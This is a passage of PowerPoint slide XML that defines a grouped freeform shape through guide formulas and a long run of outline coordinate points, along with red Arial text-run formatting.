              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0043"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2108" name="Group 89"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="228" y="851"/>
              <a:ext cx="334" cy="214"/>
              <a:chOff x="288" y="2254"/>
              <a:chExt cx="528" cy="338"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2109" name="Freeform 90"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="288" y="2254"/>
                <a:ext cx="528" cy="338"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1616"/>
                  <a:gd name="T1" fmla="*/ 0 h 1034"/>
                  <a:gd name="T2" fmla="*/ 0 w 1616"/>
                  <a:gd name="T3" fmla="*/ 0 h 1034"/>
                  <a:gd name="T4" fmla="*/ 0 w 1616"/>
                  <a:gd name="T5" fmla="*/ 0 h 1034"/>
                  <a:gd name="T6" fmla="*/ 0 w 1616"/>
                  <a:gd name="T7" fmla="*/ 0 h 1034"/>
                  <a:gd name="T8" fmla="*/ 0 w 1616"/>
                  <a:gd name="T9" fmla="*/ 0 h 1034"/>
                  <a:gd name="T10" fmla="*/ 0 w 1616"/>
                  <a:gd name="T11" fmla="*/ 0 h 1034"/>
                  <a:gd name="T12" fmla="*/ 0 w 1616"/>
                  <a:gd name="T13" fmla="*/ 0 h 1034"/>
                  <a:gd name="T14" fmla="*/ 0 w 1616"/>
                  <a:gd name="T15" fmla="*/ 0 h 1034"/>
                  <a:gd name="T16" fmla="*/ 0 w 1616"/>
                  <a:gd name="T17" fmla="*/ 0 h 1034"/>
                  <a:gd name="T18" fmla="*/ 0 w 1616"/>
                  <a:gd name="T19" fmla="*/ 0 h 1034"/>
                  <a:gd name="T20" fmla="*/ 0 w 1616"/>
                  <a:gd name="T21" fmla="*/ 0 h 1034"/>
                  <a:gd name="T22" fmla="*/ 0 w 1616"/>
                  <a:gd name="T23" fmla="*/ 0 h 1034"/>
                  <a:gd name="T24" fmla="*/ 0 w 1616"/>
                  <a:gd name="T25" fmla="*/ 0 h 1034"/>
                  <a:gd name="T26" fmla="*/ 0 w 1616"/>
                  <a:gd name="T27" fmla="*/ 0 h 1034"/>
                  <a:gd name="T28" fmla="*/ 0 w 1616"/>
                  <a:gd name="T29" fmla="*/ 0 h 1034"/>
                  <a:gd name="T30" fmla="*/ 0 w 1616"/>
                  <a:gd name="T31" fmla="*/ 0 h 1034"/>
                  <a:gd name="T32" fmla="*/ 0 w 1616"/>
                  <a:gd name="T33" fmla="*/ 0 h 1034"/>
                  <a:gd name="T34" fmla="*/ 0 w 1616"/>
                  <a:gd name="T35" fmla="*/ 0 h 1034"/>
                  <a:gd name="T36" fmla="*/ 0 w 1616"/>
                  <a:gd name="T37" fmla="*/ 0 h 1034"/>
                  <a:gd name="T38" fmla="*/ 0 w 1616"/>
                  <a:gd name="T39" fmla="*/ 0 h 1034"/>
                  <a:gd name="T40" fmla="*/ 0 w 1616"/>
                  <a:gd name="T41" fmla="*/ 0 h 1034"/>
                  <a:gd name="T42" fmla="*/ 0 w 1616"/>
                  <a:gd name="T43" fmla="*/ 0 h 1034"/>
                  <a:gd name="T44" fmla="*/ 0 w 1616"/>
                  <a:gd name="T45" fmla="*/ 0 h 1034"/>
                  <a:gd name="T46" fmla="*/ 0 w 1616"/>
                  <a:gd name="T47" fmla="*/ 0 h 1034"/>
                  <a:gd name="T48" fmla="*/ 0 w 1616"/>
                  <a:gd name="T49" fmla="*/ 0 h 1034"/>
                  <a:gd name="T50" fmla="*/ 0 w 1616"/>
                  <a:gd name="T51" fmla="*/ 0 h 1034"/>
                  <a:gd name="T52" fmla="*/ 0 w 1616"/>
                  <a:gd name="T53" fmla="*/ 0 h 1034"/>
                  <a:gd name="T54" fmla="*/ 0 w 1616"/>
                  <a:gd name="T55" fmla="*/ 0 h 1034"/>
                  <a:gd name="T56" fmla="*/ 0 w 1616"/>
                  <a:gd name="T57" fmla="*/ 0 h 1034"/>
                  <a:gd name="T58" fmla="*/ 0 w 1616"/>
                  <a:gd name="T59" fmla="*/ 0 h 1034"/>
                  <a:gd name="T60" fmla="*/ 0 w 1616"/>
                  <a:gd name="T61" fmla="*/ 0 h 1034"/>
                  <a:gd name="T62" fmla="*/ 0 w 1616"/>
                  <a:gd name="T63" fmla="*/ 0 h 1034"/>
                  <a:gd name="T64" fmla="*/ 0 w 1616"/>
                  <a:gd name="T65" fmla="*/ 0 h 1034"/>
                  <a:gd name="T66" fmla="*/ 0 w 1616"/>
                  <a:gd name="T67" fmla="*/ 0 h 1034"/>
                  <a:gd name="T68" fmla="*/ 0 w 1616"/>
                  <a:gd name="T69" fmla="*/ 0 h 1034"/>
                  <a:gd name="T70" fmla="*/ 0 w 1616"/>
                  <a:gd name="T71" fmla="*/ 0 h 1034"/>
                  <a:gd name="T72" fmla="*/ 0 w 1616"/>
                  <a:gd name="T73" fmla="*/ 0 h 1034"/>
                  <a:gd name="T74" fmla="*/ 0 w 1616"/>
                  <a:gd name="T75" fmla="*/ 0 h 1034"/>
                  <a:gd name="T76" fmla="*/ 0 w 1616"/>
                  <a:gd name="T77" fmla="*/ 0 h 1034"/>
                  <a:gd name="T78" fmla="*/ 0 w 1616"/>
                  <a:gd name="T79" fmla="*/ 0 h 1034"/>
                  <a:gd name="T80" fmla="*/ 0 w 1616"/>
                  <a:gd name="T81" fmla="*/ 0 h 1034"/>
                  <a:gd name="T82" fmla="*/ 0 w 1616"/>
                  <a:gd name="T83" fmla="*/ 0 h 1034"/>
                  <a:gd name="T84" fmla="*/ 0 w 1616"/>
                  <a:gd name="T85" fmla="*/ 0 h 1034"/>
                  <a:gd name="T86" fmla="*/ 0 w 1616"/>
                  <a:gd name="T87" fmla="*/ 0 h 1034"/>
                  <a:gd name="T88" fmla="*/ 0 w 1616"/>
                  <a:gd name="T89" fmla="*/ 0 h 1034"/>
                  <a:gd name="T90" fmla="*/ 0 w 1616"/>
                  <a:gd name="T91" fmla="*/ 0 h 1034"/>
                  <a:gd name="T92" fmla="*/ 0 w 1616"/>
                  <a:gd name="T93" fmla="*/ 0 h 1034"/>
                  <a:gd name="T94" fmla="*/ 0 w 1616"/>
                  <a:gd name="T95" fmla="*/ 0 h 1034"/>
                  <a:gd name="T96" fmla="*/ 0 w 1616"/>
                  <a:gd name="T97" fmla="*/ 0 h 1034"/>
                  <a:gd name="T98" fmla="*/ 0 w 1616"/>
                  <a:gd name="T99" fmla="*/ 0 h 1034"/>
                  <a:gd name="T100" fmla="*/ 0 w 1616"/>
                  <a:gd name="T101" fmla="*/ 0 h 1034"/>
                  <a:gd name="T102" fmla="*/ 0 w 1616"/>
                  <a:gd name="T103" fmla="*/ 0 h 1034"/>
                  <a:gd name="T104" fmla="*/ 0 w 1616"/>
                  <a:gd name="T105" fmla="*/ 0 h 1034"/>
                  <a:gd name="T106" fmla="*/ 0 w 1616"/>
                  <a:gd name="T107" fmla="*/ 0 h 1034"/>
                  <a:gd name="T108" fmla="*/ 0 w 1616"/>
                  <a:gd name="T109" fmla="*/ 0 h 10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16"/>
                  <a:gd name="T166" fmla="*/ 0 h 1034"/>
                  <a:gd name="T167" fmla="*/ 1616 w 1616"/>
                  <a:gd name="T168" fmla="*/ 1034 h 10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16" h="1034">
                    <a:moveTo>
                      <a:pt x="499" y="13"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="504" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="591" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="616" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="618" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="631" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="639" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="647" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="686" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="696" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="706" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="715" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="729" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="736" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="746" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="760" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="790" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="805" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="815" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="823" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="842" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="850" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="856" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="859" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="865" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="874" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="882" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="891" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="899" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="905" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="909" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="914" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="925" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="935" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="948" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="959" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="970" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="978" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="982" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="989" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1001" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1013" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1027" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1041" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1053" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1059" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1063" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1069" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1078" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1088" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1099" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1108" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1117" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1123" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1125" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1132" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1148" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1171" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1197" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1223" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1246" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1264" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1273" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1281" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1292" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1308" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1324" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1339" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1353" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1363" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1369" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1374" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1383" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1397" y="339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1412" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1427" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1441" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1451" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1458" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1488" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1513" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1542" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1570" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1593" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1609" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="576"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="595"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1616" y="664"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1612" y="691"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1606" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1598" y="730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1589" y="756"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1580" y="781"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1571" y="803"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1564" y="820"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1559" y="829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1555" y="835"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1547" y="842"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1536" y="851"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1525" y="859"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1512" y="867"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1501" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1489" y="880"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1479" y="882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468" y="883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1449" y="883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1423" y="884"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1395" y="886"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1367" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1342" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1322" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1311" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1304" y="886"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1294" y="883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1284" y="882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1274" y="880"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1262" y="878"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1253" y="875"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1245" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1240" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1220" y="881"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1194" y="888"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1168" y="897"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1141" y="904"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1117" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1095" y="918"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1079" y="922"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1071" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1068" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1059" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1050" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1038" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1023" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1008" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="990" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="974" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="957" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="940" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="925" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="911" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="898" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="888" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="881" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="878" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="871" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="861" y="930"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="849" y="937"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="944"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="816" y="953"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="797" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="778" y="972"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="982"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="738" y="993"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="720" y="1002"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="1010"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="685" y="1018"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="671" y="1025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="1029"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="653" y="1033"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="648" y="1034"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="1033"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="1032"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="1028"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="1024"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="1019"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="497" y="1012"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="476" y="1005"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="996"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="994"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="991"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="988"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="985"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="980"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="976"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="973"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="968"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="965"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="960"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="952"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="945"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="939"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="932"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="920"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="916"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="913"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="905"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="860"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="798"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="768"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="744"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="729"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="697"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="660"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="611"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="528"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="490"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="369" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="33"/>
